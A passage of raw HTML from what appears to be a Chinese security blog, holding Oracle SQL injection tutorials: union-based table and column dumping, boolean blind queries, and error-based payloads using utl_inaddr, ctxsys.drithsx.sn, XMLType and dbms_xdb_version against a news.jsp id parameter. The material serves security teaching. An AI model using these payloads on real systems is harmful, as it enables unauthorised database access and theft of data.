rgb(255, 255, 255);">oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型。</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139680758462.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">第一个字段为数字型</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139683758439.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">第二个字段为字符型</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">4、确定回显位</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;<img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139683344843.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;5、爆表</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">用户第一个表</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139683830876.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139684998396.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">或者</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139685638140.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">其它表使用相同方法即可爆出</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">6、爆字段</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">这里以我爆出的用户帐号表为例进行爆字段</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/159013968525524.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">爆第二个字段,方法和爆第二个表一样,加个删选条件就行了</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/159013968567738.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;其它的类似</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">7、爆值</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">oracle的字符连接用||符号,或者用concat,但是concat只能连接连个字符串(可以嵌套实现连接多个字符串),我这里用||符号连接输出的字符串。</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139685785996.png" alt="" style="margin: 0px; padding: 0px; border: 0px; height: auto; max-width: 660px;"/></p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">爆其它数据的方法和爆表,爆字段的一样,这里不再赘述。</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;二、布尔型盲注</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">这里贴一些语句,具体就不手工做了</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">(select length(table_name) from user_tables where rownum=1)&gt;5</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">(select ascii(substr(table_name,1,1)) from user_tables where rownum=1)&gt;100</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">(select length(column_name) from user_tab_columns where table_name=xxx and rownum=1)</p><p style="margin: 10px auto; padding: 0px; font-family: Arial, sans-serif; font-size: 12px; white-space: normal; background-color: rgb(255, 255, 255);">(select ascii(substr(column_name,1,1)) from user_tab_columns where rownum=1 and table_name=xxx)&gt;100</p><p><br/></p>Fri, 22 May 2020 17:27:28 +0800Oracle报错注入总结http://www.liugongrui.com/?id=260<h2 style="margin: 20px 0px 10px; padding: 0px; border-top: none; border-right: none; border-bottom: 1px solid rgb(238, 238, 238); border-left: none; border-image: initial; background-repeat: no-repeat; font-size: 28pt; line-height: 1.5; box-sizing: inherit; font-family: Calibri, &quot;Microsoft YaHei&quot;, &quot;Hiragino Sans GB&quot;, Arial, sans-serif; color: rgb(51, 51, 51); white-space: normal; background-color: rgb(255, 255, 255);">0x00&nbsp;前言</h2><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">在oracle注入时候出现了数据库<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">报错信息</span>,可以优先选择<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">报错注入</span>,使用报错的方式将查询数据的结果带出到错误页面中。</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">使用报错注入需要使用类似 1=[报错语句],1&gt;[报错语句],使用<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">比较运算符</span>,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式。</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">判断注入</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;(select&nbsp;count&nbsp;(*)&nbsp;from&nbsp;user_tables)&gt;0&nbsp;--http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;(select&nbsp;count&nbsp;(*)&nbsp;from&nbsp;dual)&gt;0&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139622326478.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><div style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255); text-align: right;"><a href="https://www.cnblogs.com/-qing-/p/10949562.html#_labelTop" style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; text-decoration-line: none; color: rgb(102, 178, 255); transition: all 0.2s ease 0s;">回到顶部(go to top)</a><a name="_label1" style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: rgb(102, 178, 255); transition: all 0.2s ease 0s;"></a></div><h2 style="margin: 20px 0px 10px; padding: 0px; border-top: none; border-right: none; border-bottom: 1px solid rgb(238, 238, 238); border-left: none; border-image: initial; background-repeat: no-repeat; font-size: 28pt; line-height: 1.5; box-sizing: inherit; font-family: Calibri, &quot;Microsoft YaHei&quot;, &quot;Hiragino Sans GB&quot;, Arial, sans-serif; color: rgb(51, 51, 51); white-space: normal; background-color: rgb(255, 255, 255);">0x01&nbsp;报错函数注入</h2><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">utl_inaddr.get_host_name</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;user&nbsp;from&nbsp;dual))--http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;user&nbsp;from&nbsp;dual))--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">utl_inaddr.get_host_address&nbsp;本意是获取ip 地址,但是如果传递参数无法得到解析就会返回一个oracle 错误并显示传递的参数。</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">我们传递的是一个sql 语句所以返回的就是语句执行的结果。oracle 在启动之后,把一些系统变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。通常非常重要的信息有:</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139622655570.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">ctxsys.drithsx.sn</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=ctxsys.drithsx.sn(1,(select&nbsp;user&nbsp;from&nbsp;dual))&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139624562413.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">XMLType</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;(select&nbsp;upper(XMLType(chr(60)||chr(58)||(select&nbsp;user&nbsp;from&nbsp;dual)||chr(62)))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;(select&nbsp;upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select&nbsp;user&nbsp;from&nbsp;dual)%7c%7cchr(62)))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139624611716.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">dbms_xdb_version.checkin</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;(select&nbsp;dbms_xdb_version.checkin((select&nbsp;user&nbsp;from&nbsp;dual))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--查询版本信息 http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;(select&nbsp;dbms_xdb_version.checkin((select&nbsp;banner&nbsp;from&nbsp;sys.v_$version&nbsp;where&nbsp;rownum=1))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139625940357.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; 